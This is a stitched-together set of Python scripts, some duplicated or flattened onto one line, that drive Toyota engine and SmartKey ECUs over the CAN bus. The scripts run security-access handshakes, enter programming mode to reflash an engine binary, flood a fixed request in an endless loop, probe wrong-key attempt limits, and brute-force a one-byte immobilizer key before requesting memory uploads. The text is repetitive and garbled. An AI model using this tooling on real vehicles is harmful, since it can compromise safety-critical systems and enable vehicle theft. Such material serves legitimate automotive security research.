ECU = 0x7E0 #do security access ret = ecom.security_access(ECU) if ret == False: print "[!] [0x%04X] Security Access: FAILURE" % (ECU) sys.exit(1) print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes for i in range(0, 3): ret = ecom.send_iso_tp_data(0x720, [0xA0, 0x27]) #Grequires the to be in half-on state (power on, engine off) #Failure to be in the required mode will result in diagnostic session failing ret = ecom.diagnostic_session(ECU, [0x10, 0x02]) if ret == False: print "[!] [0x%04X] Programming Mode: Failure" % (ECU) sys.exit(1) print "[*] [0x%04X] Programming Mode: Success" % (ECU) ## for ecu_num, ecu_name in PriusECU.iteritems(): ## print "Trying security access for %s" % (ecu_name) ## #security access ## ret = ecom.security_access(ecu_num)
# Flat script: repeats one fixed ISO-TP request to CAN ID 0x7C0 through the
# ECOM cable wrapper.
from PyEcom import *
from config import *
from ctypes import *
import time
import struct

if __name__ == "__main__":
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1, 37440)

    LOOPER = 0
    SETSPEED = 62  # only referenced by the disabled block below

    # Text form of a single frame; IDH 07 / IDL C0 spell the same ID (0x7C0)
    # that the loop at the bottom addresses.
    SFFLINE = "IDH: 07, IDL: C0, Len: 08, Data: 04 30 01 00 02 00 00 00"
    SFFS = (SFFMessage * 1)()
    # Presumably fills SFFS[0] from the text line; the helper lives in the DLL.
    ecom.mydll.DbgLineToSFF(SFFLINE, pointer(SFFS[0]))

    # Disabled in the original:
    #if(SETSPEED < 200):
    #    SETSPEED = SETSPEED * 161
    #SFFS[0].data[0] = (SETSPEED >> 8) & 0xFF;
    #SFFS[0].data[1] = SETSPEED & 0xFF;
    #ecom.mydll.FixChecksum(pointer(SFFS[0]))

    # SFFS is never transmitted in this excerpt; only the request below is.
    # NOTE(review): no delay or exit condition is visible here, so the request
    # repeats as fast as send_iso_tp_data() returns. Sustained back-to-back
    # repeats of one request are a pattern bus monitoring can key on.
    target_id = 0x7C0
    while True:
        ecom.send_iso_tp_data(target_id, [0x30, 0x01, 0x00, 0x08])
# Flat script: sends two four-byte requests to CAN ID 0x781, three seconds apart.
from PyEcom import *
from config import *
from ctypes import *
import time
import struct

if __name__ == "__main__":
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1, 37440)
    #ecom.open_device(1,0)

    target_id = 0x781
    # The two payloads differ only in their last byte (0x01, then 0x02).
    first_request = [0x30, 0x01, 0x00, 0x01]
    second_request = [0x30, 0x01, 0x00, 0x02]

    # Replies are not captured or checked anywhere in this excerpt.
    ecom.send_iso_tp_data(target_id, first_request)
    time.sleep(3)
    ecom.send_iso_tp_data(target_id, second_request)

    # Disabled experiments kept from the original:
    #read one message (should contain payload of: 0x08)
    #sff = pointer(SFFMessage())
    #ecom.mydll.DbgLineToSFF("IDH: 03, IDL: 44, Len: 08, Data: FF 7F 00 00 00 08 00 D5", sff)
    #ret = ecom.send_iso_tp_data(0x781, [0x3E])
    #ecom.mydll.write_messages_from_file(ecom.handle, "input.dat")
    #ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01])
    #ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C)
    #ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
    #ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C)
    #ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
from PyEcom import * from config import * import time, struct, sys if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0, 1) ECU = 0x7E0 #Is CPU? ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) #???? ret = ecom.send_iso_tp_data(ECU, [0x13, 0x80]) #Get VIN ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) ret = ecom.security_access(ECU) if ret: print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes for i in range(0, 3):
# Flat script: sends two four-byte requests to CAN ID 0x781, three seconds apart.
from PyEcom import *
from config import *
from ctypes import *
import time
import struct

if __name__ == "__main__":
    ecom = PyEcom("Debug\\ecomcat_api")
    ecom.open_device(1, 37440)
    # ecom.open_device(1,0)

    target_id = 0x781
    # The two payloads differ only in their last byte (0x01, then 0x02).
    first_request = [0x30, 0x01, 0x00, 0x01]
    second_request = [0x30, 0x01, 0x00, 0x02]

    # Replies are not captured or checked anywhere in this excerpt.
    ecom.send_iso_tp_data(target_id, first_request)
    time.sleep(3)
    ecom.send_iso_tp_data(target_id, second_request)

    # Disabled experiments kept from the original:
    # read one message (should contain payload of: 0x08)
    # sff = pointer(SFFMessage())
    # ecom.mydll.DbgLineToSFF("IDH: 03, IDL: 44, Len: 08, Data: FF 7F 00 00 00 08 00 D5", sff)
    # ret = ecom.send_iso_tp_data(0x781, [0x3E])
    # ecom.mydll.write_messages_from_file(ecom.handle, "input.dat")
    # ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01])
    # ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C)
    # ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
    # ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C)
    # ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
target_data = nbo_int_to_bytearr(0xBC1F6FEF) if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0, 1) PREAMBLE = False #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) #do security access ret = ecom.security_access(ECU) if ret == False: print "[!] [0x%04X] Security Access: FAILURE" % (ECU) sys.exit(1) print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes
ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0,1) #Set this to False if flashing fails and the script needs re-run PREAMBLE = False #flash binary f = open("toyota_ecm.bin", "rb") #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) #do security access ret = ecom.security_access(ECU) if ret == False: print "[!] [0x%04X] Security Access: FAILURE" % (ECU) sys.exit(1) print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes
# Flat script: repeats one fixed ISO-TP request to CAN ID 0x7C0 through the
# ECOM cable wrapper.
from PyEcom import *
from config import *
from ctypes import *
import time
import struct

if __name__ == "__main__":
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1, 37440)

    LOOPER = 0
    SETSPEED = 62  # only referenced by the disabled block below

    # Text form of a single frame; IDH 07 / IDL C0 spell the same ID (0x7C0)
    # that the loop at the bottom addresses.
    SFFLINE = "IDH: 07, IDL: C0, Len: 08, Data: 04 30 01 00 02 00 00 00"
    SFFS = (SFFMessage * 1)()
    # Presumably fills SFFS[0] from the text line; the helper lives in the DLL.
    ecom.mydll.DbgLineToSFF(SFFLINE, pointer(SFFS[0]))

    # Disabled in the original:
    #if(SETSPEED < 200):
    #    SETSPEED = SETSPEED * 161
    #SFFS[0].data[0] = (SETSPEED >> 8) & 0xFF;
    #SFFS[0].data[1] = SETSPEED & 0xFF;
    #ecom.mydll.FixChecksum(pointer(SFFS[0]))

    # SFFS is never transmitted in this excerpt; only the request below is.
    # NOTE(review): no delay or exit condition is visible here, so the request
    # repeats as fast as send_iso_tp_data() returns. Sustained back-to-back
    # repeats of one request are a pattern bus monitoring can key on.
    target_id = 0x7C0
    while True:
        ecom.send_iso_tp_data(target_id, [0x30, 0x01, 0x00, 0x08])
ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0, 1) #Set this to False if flashing fails and the script needs re-run PREAMBLE = False #flash binary f = open("toyota_ecm.bin", "rb") #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) #do security access ret = ecom.security_access(ECU) if ret == False: print "[!] [0x%04X] Security Access: FAILURE" % (ECU) sys.exit(1) print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes
from PyEcom import * from config import * import time, struct, sys if __name__ == "__main__": ecom = PyEcom("Debug\\ecomcat_api") ecom.open_device(0, 1) ECU = 0x7E0 # Is CPU? ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) # Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) # ???? ret = ecom.send_iso_tp_data(ECU, [0x13, 0x80]) # Get VIN ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) ret = ecom.security_access(ECU) if ret: print "[*] [0x%04X] Security Access: Success" % (ECU) # Unsure but this happens 3x in the capture before diag programming mode # I think this may have to do w/ tellin other ECUs the one being reprogrammed # is going offline for a while and DO NOT set DTC codes for i in range(0, 3):
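# Flat script: runs eleven SecurityAccess rounds against one ECU, answering
# every seed with an all-zero key, and prints the error decoded from each reply.
from PyEcom import *
from config import *
from ctypes import *
import time
import struct

if __name__ == "__main__":
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1, 35916)

    #Engine ECU
    ECU = 0x7E0

    # NOTE(review): the count of 11 presumably exists to see how the ECU's
    # answer changes after repeated wrong keys (attempt limiting); the visible
    # code only prints whatever error comes back.
    for i in range(0, 11):
        print("Attempt %d" % (i))

        resp = ecom.send_iso_tp_data(ECU, ecom.get_security_access_payload(ECU), None)
        if not resp:
            print("No Response")
            # Nothing to parse; the original fell through and indexed into
            # the missing reply, which raises instead of trying again.
            continue

        # The seed is parsed but never used: the key below is fixed. A reply
        # shorter than six bytes (e.g. a three-byte negative response) has no
        # seed, so it is left as None rather than raising IndexError.
        seed = None
        if len(resp) >= 6:
            seed = resp[2] << 24 | resp[3] << 16 | resp[4] << 8 | resp[5]

        #obviously incorrect
        key = [0, 0, 0, 0]

        # 0x27 0x02 is the SecurityAccess "send key" request, followed by the key bytes.
        key_data = [0x27, 0x02, key[0], key[1], key[2], key[3]]
        key_resp = ecom.send_iso_tp_data(ECU, key_data, None)

        err = ecom.get_error(key_resp)
        if err != 0x00:
            print("Error: %s" % (NegRespErrStr(err)))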
target_data = nbo_int_to_bytearr(0xBC1F6FEF) if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0,1) PREAMBLE = False #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) #do security access ret = ecom.security_access(ECU) if ret == False: print "[!] [0x%04X] Security Access: FAILURE" % (ECU) sys.exit(1) print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes
if __name__ == "__main__":
    # NOTE(review): indentation was lost in this excerpt. The nesting below is
    # the flat reading: every step runs at script level, so a FAILURE is only
    # reported and the later steps still run. Confirm against the file.
    #print "[*] Starting diagnostics check..."
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1, 35916)

    ECU = 0x7E0

    #do security access
    ret = ecom.security_access(ECU)
    if ret == False:
        print("[!] [0x%04X] Security Access: FAILURE" % (ECU))
    else:
        print("[*] [0x%04X] Security Access: Success" % (ECU))

    #Unsure but this happens 3x in the capture before diag programming mode
    #I think this may have to do w/ tellin other ECUs the one being reprogrammed
    #is going offline for a while and DO NOT set DTC codes
    for _ in range(3):
        ret = ecom.send_iso_tp_data(0x720, [0xA0, 0x27])

    # [0x10, 0x02] is DiagnosticSessionControl with the programming-session
    # sub-function in ISO 14229/14230.
    ret = ecom.diagnostic_session(ECU, [0x10, 0x02])
    if ret == False:
        print("[!] [0x%04X] Programming Mode: FAILURE" % (ECU))
    else:
        print("[*] [0x%04X] Programming Mode: Sucess" % (ECU))

    # The same six-byte request is sent ten times; the replies are discarded.
    for _ in range(10):
        ecom.send_iso_tp_data(0x7E0, [0x30, 0x1C, 0x00, 0x0F, 0xA5, 0x01])
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 35916) #Engine ECU ECU = 0x7E0 for i in range(0, 11): print "Attempt %d" % (i) resp = ecom.send_iso_tp_data(ECU, ecom.get_security_access_payload(ECU), None) if not resp or len(resp) == 0: print "No Response" seed = resp[2] << 24 | resp[3] << 16 | resp[4] << 8 | resp[5] #obviously incorrect key = [0, 0, 0, 0] key_data = [0x27, 0x02, key[0], key[1], key[2], key[3]] key_resp = ecom.send_iso_tp_data(ECU, key_data, None) err = ecom.get_error(key_resp) if err != 0x00:
self.address = address self.write_address = write_address self.length = length if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 35916) ECU = 0x750 #SmartKey 0x750 [0xB5] seems to return 34 when ret[2] - 0xAB for i in range(0, 1000): ret = ecom.send_iso_tp_data(0x750, [0x27, 0x01], 0x40) #key = (ret[2] - 0xAB) & 0xFF #key = (~ret[2] + 1) & 0xFF key = i & 0xFF ret = ecom.send_iso_tp_data(0x750, [0x27, 0x02, key], 0x40) if ret[2] != 0x35: print "New Error: %d %d" % (key, i) break ret = ecom.request_upload_14229(ECU, 0x01, 0x44, 0x0000F000, 0x00000001, 0x40) ret = ecom.request_upload_14229(ECU, 0x01, 0x33, 0x0000F000, 0x00000001, 0x40) ret = ecom.request_upload_14229(ECU, 0x01, 0x24, 0x0000F000, 0x00000001, 0x40)
# Excerpt: the `class` line this constructor belongs to is outside the visible text.
def __init__(self, address, write_address, length):
    """Store the three caller-supplied values on the instance unchanged."""
    self.address = address
    self.write_address = write_address
    self.length = length


if __name__ == "__main__":
    ecom = PyEcom('Debug\\ecomcat_api')
    ecom.open_device(1, 35916)

    ECU = 0x750

    #SmartKey 0x750 [0xB5] seems to return 34 when ret[2] - 0xAB
    # Each round requests a seed (0x27 0x01) and answers with a one-byte key
    # (0x27 0x02 <key>). The key is just the loop counter masked to a byte, so
    # 1000 rounds cycle through all 256 values almost four times.
    # 0x35 is the ISO 14229 negative-response code invalidKey; presumably
    # ret[2] is the code byte of the reply. Confirm against send_iso_tp_data.
    # The loop stops on the first reply whose third byte is anything else.
    # NOTE(review): a target that enforces attempt limits would be expected to
    # answer 0x36 (exceededNumberOfAttempts) or 0x37
    # (requiredTimeDelayNotExpired) after a few wrong keys, which would end
    # this loop early and print the "New Error" line.
    for attempt in range(0, 1000):
        ret = ecom.send_iso_tp_data(ECU, [0x27, 0x01], 0x40)
        #key = (ret[2] - 0xAB) & 0xFF
        #key = (~ret[2] + 1) & 0xFF
        key = attempt & 0xFF
        ret = ecom.send_iso_tp_data(ECU, [0x27, 0x02, key], 0x40)
        if ret[2] != 0x35:
            print("New Error: %d %d" % (key, attempt))
            break

    # NOTE(review): indentation was lost in this excerpt; the upload requests
    # are read as following the loop, not as part of its body.
    # Only the third argument varies between calls; it looks like the
    # ISO 14229 addressAndLengthFormatIdentifier. Confirm against
    # request_upload_14229.
    for format_id in (0x44, 0x33, 0x24, 0x22, 0x12):
        ret = ecom.request_upload_14229(ECU, 0x01, format_id, 0x0000F000, 0x00000001, 0x40)